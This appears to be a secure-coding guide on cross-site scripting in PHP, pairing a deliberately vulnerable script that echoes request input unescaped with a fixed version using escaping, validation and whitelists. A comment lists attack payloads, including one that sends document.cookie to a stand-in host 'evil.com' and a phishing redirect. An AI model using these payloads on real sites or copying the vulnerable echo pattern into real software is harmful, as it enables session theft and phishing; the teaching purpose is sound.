Cross-site scripting (XSS) lets attackers execute scripts, steal sessions, and exfiltrate data.
<?php
// Vulnerable PHP script with XSS
// Direct echoing of GET parameters
if (isset($_GET['name'])) {
echo "<h1>Welcome " . $_GET['name'] . "!</h1>";
}
// Form processing without encoding
if ($_POST) {
$comment = $_POST['comment'] ?? '';
$author = $_POST['author'] ?? '';
$email = $_POST['email'] ?? '';
// Vulnerable: Direct output of form data
echo "<div class='comment-section'>";
echo "<h3>Comment by: " . $author . "</h3>";
echo "<p>Email: " . $email . "</p>";
echo "<div class='comment-content'>" . $comment . "</div>";
echo "</div>";
}
// Error message with user input
if (isset($_GET['error'])) {
echo "<div class='error'>Error: " . $_GET['error'] . "</div>";
}
// Search results display
if (isset($_GET['q'])) {
$query = $_GET['q'];
echo "<h2>Search results for: " . $query . "</h2>";
echo "<p>No results found for '" . $query . "'</p>";
}
// Profile page with user data
if (isset($_GET['bio'])) {
echo "<div class='profile'>";
echo "<div class='bio'>" . $_GET['bio'] . "</div>";
echo "</div>";
}
// Dynamic CSS class injection
$theme = $_GET['theme'] ?? 'default';
echo "<div class='" . $theme . "'>";
echo "Content with user-controlled class";
echo "</div>";
// JavaScript context vulnerability
if (isset($_GET['callback'])) {
echo "<script>";
echo "window." . $_GET['callback'] . "();";
echo "</script>";
}
/*
Attack vectors:
?name=<script>alert('XSS')</script>
?error=<img src=x onerror="fetch('//evil.com/steal?cookie='+document.cookie)">
?q=<iframe src="javascript:alert('XSS')"></iframe>
?bio=<script>document.location='//evil.com/phish'</script>
?theme=" onload="alert('XSS')
?callback=alert('XSS')//
*/
?><?php
// Secure PHP script with proper XSS prevention
// Helper function for HTML escaping
function h($str) {
return htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
// Helper function for attribute escaping
function attr($str) {
return htmlspecialchars($str, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
// Helper function for URL validation
function safe_url($url) {
$parsed = parse_url($url);
if (!$parsed || !in_array($parsed['scheme'] ?? '', ['http', 'https'])) {
return '#'; // Safe fallback
}
return $url;
}
// Safe echoing of GET parameters
if (isset($_GET['name'])) {
echo "<h1>Welcome " . h($_GET['name']) . "!</h1>";
}
// Safe form processing with encoding
if ($_POST) {
$comment = $_POST['comment'] ?? '';
$author = $_POST['author'] ?? '';
$email = $_POST['email'] ?? '';
// Input validation
if (strlen($comment) > 1000) {
$comment = substr($comment, 0, 1000);
}
if (strlen($author) > 100) {
$author = substr($author, 0, 100);
}
// Email validation
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
$email = 'Invalid email';
}
// Safe: HTML encoding for all output
echo "<div class='comment-section'>";
echo "<h3>Comment by: " . h($author) . "</h3>";
echo "<p>Email: " . h($email) . "</p>";
echo "<div class='comment-content'>" . h($comment) . "</div>";
echo "</div>";
}
// Safe error message handling
if (isset($_GET['error'])) {
// Validate error code against whitelist
$allowed_errors = [
'not_found' => 'Page not found',
'access_denied' => 'Access denied',
'invalid_input' => 'Invalid input provided'
];
$error_code = $_GET['error'];
$error_message = $allowed_errors[$error_code] ?? 'Unknown error';
echo "<div class='error'>Error: " . h($error_message) . "</div>";
}
// Safe search results display
if (isset($_GET['q'])) {
$query = $_GET['q'];
// Limit query length
if (strlen($query) > 100) {
$query = substr($query, 0, 100);
}
echo "<h2>Search results for: " . h($query) . "</h2>";
echo "<p>No results found for '" . h($query) . "'</p>";
}
// Safe profile page with user data
if (isset($_GET['bio'])) {
$bio = $_GET['bio'];
// Limit bio length
if (strlen($bio) > 500) {
$bio = substr($bio, 0, 500);
}
echo "<div class='profile'>";
echo "<div class='bio'>" . h($bio) . "</div>";
echo "</div>";
}
// Safe CSS class handling
$theme = $_GET['theme'] ?? 'default';
// Validate theme against whitelist
$allowed_themes = ['default', 'dark', 'light', 'blue'];
if (!in_array($theme, $allowed_themes)) {
$theme = 'default';
}
echo "<div class='" . attr($theme) . "'>";
echo "Content with validated class";
echo "</div>";
// Safe JavaScript context handling
if (isset($_GET['callback'])) {
// Validate callback name (alphanumeric only)
$callback = $_GET['callback'];
if (preg_match('/^[a-zA-Z_][a-zA-Z0-9_]*$/', $callback)) {
// Whitelist allowed callbacks
$allowed_callbacks = ['showWelcome', 'initApp', 'handleData'];
if (in_array($callback, $allowed_callbacks)) {
echo "<script>";
echo "window." . $callback . "();";
echo "</script>";
}
}
}
// Alternative: Using Twig template engine (recommended)
/*
require_once 'vendor/autoload.php';
$loader = new \Twig\Loader\FilesystemLoader('templates');
$twig = new \Twig\Environment($loader, ['autoescape' => 'html']);
echo $twig->render('page.html', [
'name' => $_GET['name'] ?? '',
'query' => $_GET['q'] ?? '',
'theme' => $theme
]);
*/
// Alternative: Using output buffering with filtering
function safe_output($content) {
return h($content);
}
ob_start('safe_output');
echo $_GET['unsafe_content'] ?? '';
ob_end_flush(); // Content is automatically escaped
?>The vulnerable code directly echoes user input without HTML encoding, allowing XSS attacks. The fixed version uses htmlspecialchars(), input validation, whitelisting, and proper context-aware escaping.
User-controlled $_GET/$_POST/$_REQUEST values are echoed without HTML encoding or context-aware escaping.
Sourcery automatically identifies cross-site scripting (xss) from http request data echoed in php and many other security issues in your codebase.